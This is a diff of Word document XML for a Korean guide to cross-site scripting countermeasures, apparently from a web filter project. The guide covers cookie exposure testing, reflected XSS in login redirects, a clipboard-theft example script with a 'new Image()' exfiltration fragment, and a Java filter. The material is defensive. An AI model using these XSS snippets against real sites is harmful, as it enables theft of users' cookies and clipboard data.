-    <w:rsid w:val="00431F07"/>
-    <w:pPr>
-      <w:keepNext/>
-      <w:outlineLvl w:val="0"/>
-    </w:pPr>
-    <w:rPr>
-      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
-      <w:sz w:val="28"/>
-      <w:szCs w:val="28"/>
-    </w:rPr>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="2">
-    <w:name w:val="heading 2"/>
-    <w:basedOn w:val="a"/>
-    <w:next w:val="a"/>
-    <w:link w:val="2Char"/>
-    <w:uiPriority w:val="9"/>
-    <w:unhideWhenUsed/>
-    <w:qFormat/>
-    <w:rsid w:val="00431F07"/>
-    <w:pPr>
-      <w:keepNext/>
-      <w:outlineLvl w:val="1"/>
-    </w:pPr>
-    <w:rPr>
-      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
-    </w:rPr>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="3">
-    <w:name w:val="heading 3"/>
-    <w:basedOn w:val="a"/>
-    <w:next w:val="a"/>
-    <w:link w:val="3Char"/>
-    <w:uiPriority w:val="9"/>
-    <w:unhideWhenUsed/>
-    <w:qFormat/>
-    <w:rsid w:val="00431F07"/>
-    <w:pPr>
-      <w:keepNext/>
-      <w:ind w:leftChars="300" w:left="300" w:hangingChars="200" w:hanging="2000"/>
-      <w:outlineLvl w:val="2"/>
-    </w:pPr>
-    <w:rPr>
-      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
-    </w:rPr>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="4">
-    <w:name w:val="heading 4"/>
-    <w:basedOn w:val="a"/>
-    <w:next w:val="a"/>
-    <w:link w:val="4Char"/>
-    <w:uiPriority w:val="9"/>
-    <w:unhideWhenUsed/>
-    <w:qFormat/>
-    <w:rsid w:val="00431F07"/>
-    <w:pPr>
-      <w:keepNext/>
-      <w:ind w:leftChars="400" w:left="400" w:hangingChars="200" w:hanging="2000"/>
-      <w:outlineLvl w:val="3"/>
-    </w:pPr>
-    <w:rPr>
-      <w:b/>
-      <w:bCs/>
-    </w:rPr>
-  </w:style>
-  <w:style w:type="character" w:default="1" w:styleId="a0">
-    <w:name w:val="Default Paragraph Font"/>
-    <w:uiPriority w:val="1"/>
-    <w:semiHidden/>
-    <w:unhideWhenUsed/>
-  </w:style>
-  <w:style w:type="table" w:default="1" w:styleId="a1">
-    <w:name w:val="Normal Table"/>
-    <w:uiPriority w:val="99"/>
-    <w:semiHidden/>
-    <w:unhideWhenUsed/>
-    <w:tblPr>
-      <w:tblInd w:w="0" w:type="dxa"/>
-      <w:tblCellMar>
-        <w:top w:w="0" w:type="dxa"/>
-        <w:left w:w="108" w:type="dxa"/>
-        <w:bottom w:w="0" w:type="dxa"/>
-        <w:right w:w="108" w:type="dxa"/>
-      </w:tblCellMar>
-    </w:tblPr>
-  </w:style>
-  <w:style w:type="numbering" w:default="1" w:styleId="a2">
-    <w:name w:val="No List"/>
-    <w:uiPriority w:val="99"/>
-    <w:semiHidden/>
-    <w:unhideWhenUsed/>
-  </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="1Char">
-    <w:name w:val="제목 1 Char"/>
-    <w:basedOn w:val="a0"/>
-    <w:link w:val="1"/>
-    <w:uiPriority w:val="9"/>
-    <w:rsid w:val="00431F07"/>
-    <w:rPr>
-      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
-      <w:sz w:val="28"/>
-      <w:szCs w:val="28"/>
-    </w:rPr>
-  </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="2Char">
-    <w:name w:val="제목 2 Char"/>
-    <w:basedOn w:val="a0"/>
-    <w:link w:val="2"/>
-    <w:uiPriority w:val="9"/>
-    <w:rsid w:val="00431F07"/>
-    <w:rPr>
-      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
-    </w:rPr>
-  </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="3Char">
-    <w:name w:val="제목 3 Char"/>
-    <w:basedOn w:val="a0"/>
-    <w:link w:val="3"/>
-    <w:uiPriority w:val="9"/>
-    <w:rsid w:val="00431F07"/>
-    <w:rPr>
-      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
-    </w:rPr>
-  </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="4Char">
-    <w:name w:val="제목 4 Char"/>
-    <w:basedOn w:val="a0"/>
-    <w:link w:val="4"/>
-    <w:uiPriority w:val="9"/>
-    <w:rsid w:val="00431F07"/>
-    <w:rPr>
-      <w:b/>
-      <w:bCs/>
-    </w:rPr>
-  </w:style>
-  <w:style w:type="table" w:styleId="a3">
-    <w:name w:val="Table Grid"/>
-    <w:basedOn w:val="a1"/>
-    <w:uiPriority w:val="59"/>
-    <w:rsid w:val="00431F07"/>
-    <w:pPr>
-      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-    </w:pPr>
-    <w:tblPr>
-      <w:tblBorders>
-        <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-        <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-        <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-        <w:insideH w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-        <w:insideV w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-      </w:tblBorders>
-    </w:tblPr>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="a4">
-    <w:name w:val="List Paragraph"/>
-    <w:basedOn w:val="a"/>
-    <w:uiPriority w:val="34"/>
-    <w:qFormat/>
-    <w:rsid w:val="00431F07"/>
-    <w:pPr>
-      <w:ind w:leftChars="400" w:left="800"/>
-    </w:pPr>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="a5">
-    <w:name w:val="Balloon Text"/>
-    <w:basedOn w:val="a"/>
-    <w:link w:val="Char"/>
-    <w:uiPriority w:val="99"/>
-    <w:semiHidden/>
-    <w:unhideWhenUsed/>
-    <w:rsid w:val="009A2F22"/>
-    <w:pPr>
-      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-    </w:pPr>
-    <w:rPr>
-      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
-      <w:sz w:val="18"/>
-      <w:szCs w:val="18"/>
-    </w:rPr>
-  </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="Char">
-    <w:name w:val="풍선 도움말 텍스트 Char"/>
+  <w:style w:type="character" w:customStyle="1" w:styleId="a6">
+    <w:name w:val="풍선 도움말 텍스트 문자"/>
     <w:basedOn w:val="a0"/>
     <w:link w:val="a5"/>
     <w:uiPriority w:val="99"/>
@@ -5201,7 +5359,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{163F1C2F-8EEE-49A9-9699-A6BC584ED315}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{1206FFCC-D365-A640-ADAA-3C5FD948CD95}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/WebFilter/크로스 사이트 스크립팅 대응방안.docx
+++ b/WebFilter/크로스 사이트 스크립팅 대응방안.docx
@@ -1,6 +1,6 @@
 
 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
-<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mo="http://schemas.microsoft.com/office/mac/office/2008/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:mv="urn:schemas-microsoft-com:mac:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 wp14">
+<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14">
   <w:body>
     <w:p>
       <w:pPr>
@@ -77,67 +77,37 @@
       <w:r>
         <w:t>”</w:t>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>를 출력하는 테스트 구문으로 취약점 여부를 테스트한다. 이 때문에</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>“</w:t>
+      </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>를</w:t>
+        <w:t>document.cookie</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 출력하는 테스트 구문으로 취약점 여부를 테스트한다. 이 때문에</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>“</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>document.cookie</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
         <w:t>”</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>를</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 통한 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>인증정보</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 노출 방지를 목표로 하여 XSS을 활용한 다양한 공격 방식을 대비하지 못하는 </w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">를 통한 인증정보 노출 방지를 목표로 하여 XSS을 활용한 다양한 공격 방식을 대비하지 못하는 </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -219,9 +189,6 @@
           <w:numId w:val="6"/>
         </w:numPr>
         <w:ind w:leftChars="0" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -249,9 +216,6 @@
           <w:p>
             <w:pPr>
               <w:ind w:left="800"/>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
             </w:pPr>
           </w:p>
         </w:tc>
@@ -295,110 +259,8 @@
       </w:pPr>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve">비 인가 상태에서 사이트 이용 중 인증이 필요한 로그인 페이지로 사용자를 이동시켜 로그인 완료 후, 다시 이용 중이던 페이지로 이동시켜주는 방식의 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve">서비스들을 많이 볼 수 있다. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve">이때 로그인 후 이동할 페이지 값을 페이지에 확인없이 포함하여 </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">Reflected XSS </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>취약점이 발생한다.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
       <w:bookmarkStart w:id="0" w:name="_GoBack"/>
       <w:bookmarkEnd w:id="0"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="3"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="4"/>
-        </w:numPr>
-        <w:ind w:leftChars="0" w:firstLineChars="0"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>클립보드 값 탈취</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>키로깅</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 공격과 유사하지만 클립보드에 존재하는 값을 가로챈다는 차이점이 있다. 다음은 클립보드 값을 가로채는 공격의 예시이다. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="4"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="5"/>
-        </w:numPr>
-        <w:ind w:leftChars="0" w:firstLineChars="0"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>클립보드 복사</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 페이지</w:t>
-      </w:r>
     </w:p>
     <w:tbl>
       <w:tblPr>
@@ -417,6 +279,156 @@
             <w:gridSpan w:val="2"/>
           </w:tcPr>
           <w:p>
+            <w:r>
+              <w:t>&lt;script&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t>&lt;/script&gt;</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="304"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1101" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>실행결과</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9563" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">비 인가 상태에서 사이트 이용 중 인증이 필요한 로그인 페이지로 사용자를 이동시켜 로그인 완료 후, 다시 이용 중이던 페이지로 이동시켜주는 방식의 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">서비스들을 많이 볼 수 있다. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">이때 로그인 후 이동할 페이지 값을 페이지에 확인없이 포함하여 </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Reflected XSS </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>취약점이 발생한다.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:ind w:leftChars="0" w:firstLineChars="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>클립보드 값 탈취</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>키로깅</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 공격과 유사하지만 클립보드에 존재하는 값을 가로챈다는 차이점이 있다. 다음은 클립보드 값을 가로채는 공격의 예시이다. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="4"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:ind w:leftChars="0" w:firstLineChars="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>클립보드 복사</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 페이지</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="a3"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="1101"/>
+        <w:gridCol w:w="9563"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="10664" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+          </w:tcPr>
+          <w:p>
             <w:pPr>
               <w:ind w:left="800"/>
             </w:pPr>
@@ -437,7 +449,6 @@
               <w:ind w:left="800"/>
             </w:pPr>
             <w:r>
-              <w:lastRenderedPageBreak/>
               <w:t>&lt;head&gt;</w:t>
             </w:r>
           </w:p>
@@ -636,7 +647,6 @@
                 <w:rFonts w:hint="eastAsia"/>
                 <w:b/>
               </w:rPr>
-              <w:lastRenderedPageBreak/>
               <w:t>실행결과</w:t>
             </w:r>
           </w:p>
@@ -666,7 +676,7 @@
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill rotWithShape="1">
-                          <a:blip r:embed="rId6">
+                          <a:blip r:embed="rId7">
                             <a:extLst>
                               <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                 <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -705,11 +715,6 @@
     </w:tbl>
     <w:p/>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -765,6 +770,7 @@
           </w:p>
           <w:p>
             <w:r>
+              <w:lastRenderedPageBreak/>
               <w:t>new Image().</w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
@@ -812,6 +818,7 @@
                 <w:rFonts w:hint="eastAsia"/>
                 <w:b/>
               </w:rPr>
+              <w:lastRenderedPageBreak/>
               <w:t>실행결과</w:t>
             </w:r>
           </w:p>
@@ -883,40 +890,61 @@
         <w:t>DDoS 공격</w:t>
       </w:r>
     </w:p>
-    <w:p/>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="2"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>결론</w:t>
-      </w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve">XSS 취약점은 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>사용자의 입력 값을 제대로 검증하지 않아 삽입된 스크립트 구문이 동작하는 것이 근본적인 원인이다. 특정 구문 기반 확인 방식은 취약점을 해결할 수 없다. 스크립트 구문이나 HTML 태그의 입력과 동작을 막는 것에 목표를 두고 지속적인 보안이 필요하다.</w:t>
+        <w:pStyle w:val="3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:ind w:leftChars="0" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>HTML Injection</w:t>
       </w:r>
     </w:p>
     <w:p/>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>결론</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">XSS 취약점은 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>사용자의 입력 값을 제대로 검증하지 않아 삽입된 스크립트 구문이 동작하는 것이 근본적인 원인이다. 특정 구문 기반 확인 방식은 취약점을 해결할 수 없다. 스크립트 구문이나 HTML 태그의 입력과 동작을 막는 것에 목표를 두고 지속적인 보안이 필요하다.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="1"/>
         <w:jc w:val="center"/>
         <w:rPr>
@@ -1105,6 +1133,7 @@
         <w:rPr>
           <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
@@ -1319,14 +1348,6 @@
                 <w:szCs w:val="18"/>
               </w:rPr>
             </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve">import </w:t>
-            </w:r>
             <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
@@ -1334,7 +1355,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>org.apache</w:t>
+              <w:t>import</w:t>
             </w:r>
             <w:proofErr w:type="gramEnd"/>
             <w:r>
@@ -1343,35 +1364,34 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>.commons.lang3.*;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:left="800"/>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:left="800"/>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:lastRenderedPageBreak/>
+              <w:t xml:space="preserve"> org.apache.commons.lang3.*;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
               <w:t>public class main {</w:t>
             </w:r>
           </w:p>
@@ -3370,7 +3390,6 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:lastRenderedPageBreak/>
               <w:tab/>
             </w:r>
             <w:r>
@@ -3533,7 +3552,7 @@
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill rotWithShape="1">
-                          <a:blip r:embed="rId7"/>
+                          <a:blip r:embed="rId8"/>
                           <a:srcRect b="10989"/>
                           <a:stretch/>
                         </pic:blipFill>
@@ -3819,7 +3838,7 @@
 </file>
 
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
